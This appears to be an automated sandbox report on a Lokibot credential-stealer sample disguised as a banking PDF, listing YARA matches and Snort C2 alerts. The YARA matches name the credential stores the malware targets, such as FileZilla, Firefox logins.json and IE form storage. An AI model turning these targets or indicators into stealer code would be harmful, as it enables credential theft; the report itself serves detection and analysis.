5.0.Informe bancario.pdf.exe.400000.14.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.14.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.14.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.10.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.10.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.10.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.10.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.10.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.8.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.8.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.8.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.8.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.Informe bancario.pdf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.2.Informe bancario.pdf.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.Informe bancario.pdf.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
5.0.Informe bancario.pdf.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.6.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.6.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.6.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x42870:$s1: http:// 0x4602b:$s1: http:// 0x46a84:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x42878:$s2: https:// 0x42870:$f1: http:// 0x4602b:$f1: http:// 0x42878:$f2: https://
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x44f2e:$f1: FileZilla\recentservers.xml 0x44f6e:$f2: FileZilla\sitemanager.xml 0x431de:$b2: Mozilla\Firefox\Profiles 0x42f48:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x430f2:$s4: logins.json 0x43f9c:$s6: wand.dat 0x42a1c:$a1: username_value 0x42a0c:$a2: password_value 0x43057:$a3: encryptedUsername 0x430c4:$a3: encryptedUsername 0x4306a:$a4: encryptedPassword 0x430d8:$a4: encryptedPassword
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x427ac:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x429f4:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x419eb:$des3: 68 03 66 00 00 0x45de8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x45eb4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.14.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.14.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.0.Informe bancario.pdf.exe.400000.14.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.14.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.14.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.14.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
5.2.Informe bancario.pdf.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.Informe bancario.pdf.exe.400000.10.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.Informe bancario.pdf.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.2.Informe bancario.pdf.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.0.Informe bancario.pdf.exe.400000.10.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.0.Informe bancario.pdf.exe.400000.10.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.0.Informe bancario.pdf.exe.400000.10.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.0.Informe bancario.pdf.exe.400000.10.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x1b73e0:$s1: http:// 0x1bab9b:$s1: http:// 0x1bb5f4:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x1b73e8:$s2: https:// 0x1b73e0:$f1: http:// 0x1bab9b:$f1: http:// 0x1b73e8:$f2: https://
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x1b9a9e:$f1: FileZilla\recentservers.xml 0x1b9ade:$f2: FileZilla\sitemanager.xml 0x1b7d4e:$b2: Mozilla\Firefox\Profiles 0x1b7ab8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1b7c62:$s4: logins.json 0x1b8b0c:$s6: wand.dat 0x1b758c:$a1: username_value 0x1b757c:$a2: password_value 0x1b7bc7:$a3: encryptedUsername 0x1b7c34:$a3: encryptedUsername 0x1b7bda:$a4: encryptedPassword 0x1b7c48:$a4: encryptedPassword
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x158596:$v1: SbieDll.dll 0x1585b0:$v2: USER 0x1585bc:$v3: SANDBOX 0x1585ce:$v4: VIRUS 0x15861e:$v4: VIRUS 0x1585dc:$v5: MALWARE 0x1585ee:$v6: SCHMIDTI 0x158602:$v7: CURRENTUSER
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x1b731c:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x1b7564:$a2: last_compatible_version
0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1b655b:$des3: 68 03 66 00 00 0x1ba958:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1baa24:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 126 entries

Snort Signatures

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249744802025381 06/23/22-17:54:38.472164
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249767802024313 06/23/22-17:54:57.914899
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349836802021641 06/23/22-17:55:40.617404
SID:	2021641
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349843802025381 06/23/22-17:55:45.763232
SID:	2025381
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249746802021641 06/23/22-17:54:42.346945
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249749802024313 06/23/22-17:54:47.375834
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249767802024318 06/23/22-17:54:57.914899
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249770802024313 06/23/22-17:55:02.423254
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349745802025381 06/23/22-17:54:39.886492
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249844802021641 06/23/22-17:55:50.553165
SID:	2021641
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249749802024318 06/23/22-17:54:47.375834
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249762802025381 06/23/22-17:54:52.263394
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249773802021641 06/23/22-17:55:09.049678
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249877802021641 06/23/22-17:56:13.789082
SID:	2021641
Source Port:	49877
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349876802024318 06/23/22-17:56:11.073086
SID:	2024318
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349876802024313 06/23/22-17:56:11.073086
SID:	2024313
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349778802025381 06/23/22-17:55:15.087771
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249859802021641 06/23/22-17:55:58.152468
SID:	2021641
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249771802024318 06/23/22-17:55:04.009923
SID:	2024318
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249768802024318 06/23/22-17:54:59.413778
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349876802025381 06/23/22-17:56:11.073086
SID:	2025381
Source Port:	49876
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349835802021641 06/23/22-17:55:36.607918
SID:	2021641
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349775802021641 06/23/22-17:55:12.061012
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 104.21.40.153

Timestamp:	192.168.2.3104.21.40.15349780802024318 06/23/22-17:55:16.534873
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 172.67.154.72

Timestamp:	192.168.2.3172.67.154.7249875802024313 06/23/22-17:56:08.656582
SID:	2024313
Source Port:	49875
Destination Port:	80
